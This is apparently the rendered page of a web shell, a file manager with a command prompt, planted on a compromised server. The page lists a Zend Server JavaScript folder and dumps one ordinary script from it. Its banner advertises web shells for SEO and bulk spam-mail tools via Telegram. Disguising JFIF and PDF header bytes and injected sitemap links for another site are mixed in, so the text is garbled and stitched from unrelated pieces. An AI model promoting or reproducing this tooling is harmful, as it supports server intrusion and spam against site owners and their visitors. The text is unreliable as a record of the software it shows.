xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
var zgridLibraryDetails = new Class({
	Implements: [Events,Options],
	
	prefix: '',
	
	getOptions: function(){
		return {
		};
	},
	
	initialize: function(options){
		this.setOptions(this.getOptions(), options);
	},
	
	loadData: function(data)
	{
		if (data) {
			var rowContent = this.getRow(data);
		
			$('tableDescContent_' + data.libraryId).set('html', rowContent);
			createRuleHelpTooltip();   
			
			var tabPane = new TabPane('tableDescContent_' + data.libraryId, {}, function() {
				return 0;
			});
			
			var myVerticalSlide = new Fx.Slide('tableDescContent_' + data.libraryId, {resetHeight: true});
			myVerticalSlide.hide();
			myVerticalSlide.slideIn();
		}
	},
	
	getRow: function(data) {
		var serversLi = '';
		var errorTabContent = '';
		var errorTabTitle = '';
        var errorTabContent = '';
		
        var prerequisitesExists = false;
        
        //if (applicationPackage.prerequisites != '' && applicationPackage.prerequisites != '<dependencies></dependencies>') {
        	prerequisitesExists = true;
        //}
        
        prerequisitesExists = true;
        var serversHTML = '';
        var serversLi = '';
        if (Object.keys(data.servers).length > 0) {
        	serversLi = '<li class="tab">Active Servers</li> \ ';
        	serversHTML = this._prepareServers(data.originalServers, data.originalId);
        }

		var html =	'<ul class="tabs"> \
                            '+ errorTabTitle +' \
                    <li class="tab first">Details</li>';
	   
	    if (prerequisitesExists) {
	    	html += '<li class="tab" onclick="getLibraryPrerequisites(\'' + data.originalId + '\');">Prerequisites</li>';
	    }
		
	    var defaultLibPath = '';
	    if (data.default != undefined && data.default) {
	    	defaultLibPath = '<tr> \
	                                <td> \
	                                	Default Path \
	                                	<div class="rule-help" rel="Insert this API call in your code to use the default version of this library"></div> \
	                                	</td> \
	                                <td> \
	                                	 <code>zend_deployment_library_path(\'' + data.originalName + '\');</code> \
	                                </td> \
	                        </tr>';
	    }
	    
	    var releaseDate = '';
	    if (data.releaseDateTimestamp != '') {
	    	releaseDate  = '<tr> \
	    		<td>Release Date</td> \
	    		<td>' + formatDate(data.releaseDateTimestamp) + '</td> \
            </tr>';
	    }
	    
		html += serversLi + ' \
		        </ul> \
		        ' + errorTabContent +' \
		        <div class="content"> \
		        			<img src="/ZendServer/DeploymentLibrary/Library-Icon?id=' + data.originalId + '" class="app-details-logo"> \
		                    <table class="tableWithDesc"> \
		                            <tr> \
		                                    <td>Library</td> \
		                                    <td>' + data.originalName + '</td> \
		                            </tr> \
		                            <tr> \
		                                    <td>Version</td> \
		                                    <td>' + data.version + '</td> \
		                            </tr> \
		                            ' + releaseDate + ' \
		                            <tr> \
		                                    <td>Deployed On</td> \
		                                    <td>' + formatDate(data.creationTimeTimestamp) + '</td> \
		                            </tr> \
		                            <tr> \
		                                    <td> \
		                                    	Library Path \
		                                    	<div class="rule-help" rel="Insert this API call in your code to use this specific library version"></div> \
		                                    	</td> \
		                                    <td> \
		                                    	 <code>zend_deployment_library_path(\'' + data.originalName + '\', \'' + data.version + '\');</code> \
		                                    </td> \
	                                </tr> \
		                            ' + defaultLibPath + ' \
		                    </table> \
		        </div>';
		
		if (prerequisitesExists) {
			html += '<div class="content prerequisites_container" id="prerequisites_' + data.originalId + '"></div>';
		}
         
         html += '<div>' + serversHTML + ' \
         </div>';
         
		return html;
	},
	
	_prepareServers: function (servers, libraryId) {
    	
    	serversHTML = '<div id="libraryServersList_'+libraryId+'" class="content libraryServersList"><table class="tableWithDescServers">';
    	serversHTML +=  '<tr>';
    	
    	if (servers.length != 1) {        		
    		serversHTML += '<th>Shown: ' + servers.length + '</th>';
    	}
    	
    	serversHTML +=  '<th></th> \
            <th>Name</th> \
    		<th>Messages</th> \
    </tr> \ ';
    	
    	Object.each(servers, function(serverData, id){
    		
    		serversHTML +=  '<tr id="serverRow_'+ 'libraryId_' + id +'" class="serverRow">';
    		
    		var message = serverData.lastMessage;
    		if (message == null) {
    			message = "";
    		}
    		serversHTML += '<td class="statusImage">' + this.setServerIcon(serverData) + '</td> \
				            <td style="width: 200px">' + serverData.serverName + '</td> \
				       		<td style="white-space: normal;">' + message + '</td> \
			            </tr>';
    	}.bind(this));
    	
    	serversHTML += '</table>';
    	serversHTML += '</div>';
    	return serversHTML;
    },
    
    setServerIcon: function(serverData) {
		
    	var statusImage = '<i class="fa fa-check-circle fa-lg icon-status-ok" title="Ok"></i>';
    	// error/Error not unknown
		if (
			serverData.status.indexOf("Error") != -1 || 
			serverData.status.indexOf("error") != -1 || 
			serverData.status.indexOf("not") != -1 || 
			serverData.status.indexOf("unknown") != -1 
		) {
			statusImage = '<i class="fa fa-exclamation-triangle fa-lg icon-status-warning" title="Warning"></i>';
		}
		return statusImage;
    }

});

Filemanager

Name Type Size Permission Actions
ammap Folder 0755
datepicker Folder 0755
deploymentLibraries Folder 0755
devbar Folder 0755
highcharts Folder 0755
highcharts-new Folder 0755
highstock Folder 0755
monitor Folder 0755
plugins Folder 0755
simplemodal Folder 0755
uploader Folder 0755
FormWizard.js File 6.84 KB 0644
FragmentManager.js File 4.5 KB 0644
Fx.Scroll.Carousel.js File 2.84 KB 0644
Spinner.js File 11.52 KB 0644
TabPane.Extra.js File 1.36 KB 0644
TabPane.js File 2.46 KB 0644
ToolTip.js File 8.47 KB 0644
charts.js File 12.38 KB 0644
debuggerSettings.js File 6.98 KB 0644
defineWizard.js File 2.81 KB 0644
deploymentWizard.js File 5.04 KB 0644
ellipsis.js File 4.01 KB 0644
filter.js File 35.59 KB 0644
floatingtips.js File 8.88 KB 0644
general.js File 9.45 KB 0644
highlighter.js File 3.16 KB 0644
init.js File 5.76 KB 0644
integrateWizard.js File 2.13 KB 0644
ipwidget.js File 1.85 KB 0644
monitorRules.js File 699 B 0644
mootools-autocompleter-1.2.js File 11.67 KB 0644
mootools-more.js File 340.68 KB 0644
mootools.js File 143.5 KB 0644
onOffButton.js File 1.96 KB 0644
persistantHeaders.js File 7.28 KB 0644
placeholder.js File 970 B 0644
pluginDeploymentWizard.js File 3.58 KB 0644
plugins.js File 9.23 KB 0644
searchField.js File 3.16 KB 0644
toast.js File 8.41 KB 0644
valuesList.js File 1.74 KB 0644
version.js File 1.35 KB 0644
z-ray-libs.js File 543.21 KB 0644
z-ray-libs.min.js File 495.1 KB 0644
z-ray-libs.min.js.map File 594.33 KB 0644
zPicker.Date.js File 166 B 0644
zendcom.js File 5.35 KB 0644
zgrid.js File 14.99 KB 0644
zgrid2.js File 31.71 KB 0644
zgridApplicationInfo.js File 14.01 KB 0644
zgridAuditInfo.js File 4.89 KB 0644
zgridDirectives.js File 16.83 KB 0644
zgridEventDetails.js File 9.13 KB 0644
zgridJobDetails.js File 1.42 KB 0644
zgridLibraryDetails.js File 6.1 KB 0644
zgridPluginInfo.js File 6.96 KB 0644
zgridPolling.js File 2.14 KB 0644
zgridQueueDetails.js File 1.42 KB 0644
zgridServerDetails.js File 5.16 KB 0644
zgridVhostInfo.js File 12.79 KB 0644
zmenu.js File 6.12 KB 0644
zpager.js File 4.7 KB 0644
zsLicenseValidation.js File 2.34 KB 0644
zswebapi.js File 2.29 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml